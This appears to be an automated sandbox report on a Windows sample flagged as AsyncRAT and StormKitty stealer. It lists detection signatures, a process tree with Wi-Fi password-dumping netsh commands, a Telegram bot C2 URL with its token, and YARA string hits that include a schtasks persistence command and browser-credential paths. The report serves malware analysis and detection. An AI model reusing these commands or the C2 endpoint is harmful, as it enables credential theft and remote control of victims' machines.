Edit tour

Windows Analysis Report
FUEvp5c8lO.exe

Overview

General Information

Sample name:	FUEvp5c8lO.exe renamed because original name is a hash value
Original sample name:	e1e6a513abf55583458cd88ec8b7af9ce2a60d169526b0e6a31183a7688b8480.exe
Analysis ID:	1588087
MD5:	d2b8506820fe3c39b6b5e891170f3451
SHA1:	30f6fa21f06d99b0254fa1ff387c45921317eda7
SHA256:	e1e6a513abf55583458cd88ec8b7af9ce2a60d169526b0e6a31183a7688b8480
Tags:	AsyncRATexeuser-adrian__luca
Infos:

Detection

AsyncRAT, StormKitty, WorldWind Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected AsyncRAT

Yara detected StormKitty Stealer

Yara detected Telegram RAT

Yara detected WorldWind Stealer

AI detected suspicious sample

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious desktop.ini Action

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

FUEvp5c8lO.exe (PID: 7920 cmdline: "C:\Users\user\Desktop\FUEvp5c8lO.exe" MD5: D2B8506820FE3C39B6B5E891170F3451)

FUEvp5c8lO.exe (PID: 8116 cmdline: "C:\Users\user\Desktop\FUEvp5c8lO.exe" MD5: D2B8506820FE3C39B6B5E891170F3451)

cmd.exe (PID: 7696 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6768 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 1512 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 5972 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7772 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6024 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 3920 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage"}

Threatname: AsyncRAT

{"Server": "127.0.0.1", "Ports": "6606,7707,8808"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x28ee2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25463:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x34544:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x9ed1b:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x1f99ab:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x2255cb:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: FUEvp5c8lO.exe PID: 7920	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: FUEvp5c8lO.exe PID: 7920	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: FUEvp5c8lO.exe PID: 7920	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: FUEvp5c8lO.exe PID: 7920	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: FUEvp5c8lO.exe PID: 7920	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: FUEvp5c8lO.exe PID: 7920	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x3c9d9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: FUEvp5c8lO.exe PID: 7920	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x3b4f7:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: FUEvp5c8lO.exe PID: 8116	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
Process Memory Space: FUEvp5c8lO.exe PID: 8116	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: FUEvp5c8lO.exe PID: 8116	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: FUEvp5c8lO.exe PID: 8116	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: FUEvp5c8lO.exe PID: 8116	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: FUEvp5c8lO.exe PID: 8116	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x5e1e0:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: FUEvp5c8lO.exe PID: 8116	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x443c2:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x5ccfe:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.FUEvp5c8lO.exe.4818348.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.FUEvp5c8lO.exe.4818348.1.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.FUEvp5c8lO.exe.4818348.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.FUEvp5c8lO.exe.4818348.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.FUEvp5c8lO.exe.4818348.1.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x10183:$sk01: LimerBoy/StormKitty 0x269ce:$sk01: LimerBoy/StormKitty 0x1ba79:$str01: set_sUsername 0x1bbff:$str02: set_sIsSecure 0x1bcdd:$str03: set_sExpMonth 0x1a12c:$str04: WritePasswords 0x1abcb:$str05: WriteCookies 0x1be8d:$str06: sChromiumPswPaths 0x1be9f:$str07: sGeckoBrowserPaths 0x22ca1:$str08: Username: {1} 0x23e49:$str08: Username: {1} 0x22cbd:$str09: Password: {2} 0x23e65:$str09: Password: {2} 0x24f7f:$str10: encrypted_key":"(.*?)"
0.2.FUEvp5c8lO.exe.4818348.1.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1d6c9:$str01: get_ActivatePong 0x1d5ee:$str02: get_SslClient 0x1d5d2:$str03: get_TcpClient 0x1d690:$str04: get_SendSync 0x1d670:$str05: get_IsConnected 0x1c131:$str06: set_UseShellExecute 0x27478:$str07: Pastebin 0x2146b:$str08: Select * from AntivirusProduct 0x27352:$str10: timeout 3 > NUL 0x27250:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x272e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
0.2.FUEvp5c8lO.exe.4818348.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x272e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.FUEvp5c8lO.exe.4818348.1.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x23863:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.FUEvp5c8lO.exe.4818348.1.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2593f:$s1: \VPN\NordVPN 0x25925:$s2: \VPN\OpenVPN 0x25907:$s3: \VPN\ProtonVPN
0.2.FUEvp5c8lO.exe.4818348.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x2409b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x2410d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24197:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24229:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24293:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24305:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2439b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2442b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.FUEvp5c8lO.exe.4818348.1.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1018c:$x3: StormKitty 0x198ca:$s1: GetBSSID 0x197ca:$s2: GetAntivirus 0x24d4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x24f7d:$s6: "encrypted_key":"(.*?)"
3.2.FUEvp5c8lO.exe.400000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.FUEvp5c8lO.exe.400000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
3.2.FUEvp5c8lO.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.FUEvp5c8lO.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.FUEvp5c8lO.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.FUEvp5c8lO.exe.400000.0.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x24abd:$str09: Password: {2} 0x25c65:$str09: Password: {2} 0x26d7f:$str10: encrypted_key":"(.*?)"
3.2.FUEvp5c8lO.exe.400000.0.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
3.2.FUEvp5c8lO.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
3.2.FUEvp5c8lO.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
3.2.FUEvp5c8lO.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
3.2.FUEvp5c8lO.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.FUEvp5c8lO.exe.400000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
0.2.FUEvp5c8lO.exe.4843f68.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.FUEvp5c8lO.exe.4843f68.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.FUEvp5c8lO.exe.4843f68.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.FUEvp5c8lO.exe.4843f68.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.FUEvp5c8lO.exe.4843f68.0.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x10183:$sk01: LimerBoy/StormKitty 0x269ce:$sk01: LimerBoy/StormKitty 0x1ba79:$str01: set_sUsername 0x1bbff:$str02: set_sIsSecure 0x1bcdd:$str03: set_sExpMonth 0x1a12c:$str04: WritePasswords 0x1abcb:$str05: WriteCookies 0x1be8d:$str06: sChromiumPswPaths 0x1be9f:$str07: sGeckoBrowserPaths 0x22ca1:$str08: Username: {1} 0x23e49:$str08: Username: {1} 0x22cbd:$str09: Password: {2} 0x23e65:$str09: Password: {2} 0x24f7f:$str10: encrypted_key":"(.*?)"
0.2.FUEvp5c8lO.exe.4843f68.0.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1d6c9:$str01: get_ActivatePong 0x1d5ee:$str02: get_SslClient 0x1d5d2:$str03: get_TcpClient 0x1d690:$str04: get_SendSync 0x1d670:$str05: get_IsConnected 0x1c131:$str06: set_UseShellExecute 0x27478:$str07: Pastebin 0x2146b:$str08: Select * from AntivirusProduct 0x27352:$str10: timeout 3 > NUL 0x27250:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x272e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
0.2.FUEvp5c8lO.exe.4843f68.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x272e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.FUEvp5c8lO.exe.4843f68.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x23863:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.FUEvp5c8lO.exe.4843f68.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2593f:$s1: \VPN\NordVPN 0x25925:$s2: \VPN\OpenVPN 0x25907:$s3: \VPN\ProtonVPN
0.2.FUEvp5c8lO.exe.4843f68.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x2409b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x2410d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24197:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24229:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24293:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24305:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2439b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2442b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.FUEvp5c8lO.exe.4843f68.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1018c:$x3: StormKitty 0x198ca:$s1: GetBSSID 0x197ca:$s2: GetAntivirus 0x24d4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x24f7d:$s6: "encrypted_key":"(.*?)"
0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x24abd:$str09: Password: {2} 0x25c65:$str09: Password: {2} 0x26d7f:$str10: encrypted_key":"(.*?)"
0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x3dba3:$sk01: LimerBoy/StormKitty 0x543ee:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x49499:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x4961f:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x496fd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x47b4c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x485eb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x498ad:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x498bf:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x506c1:$str08: Username: {1}
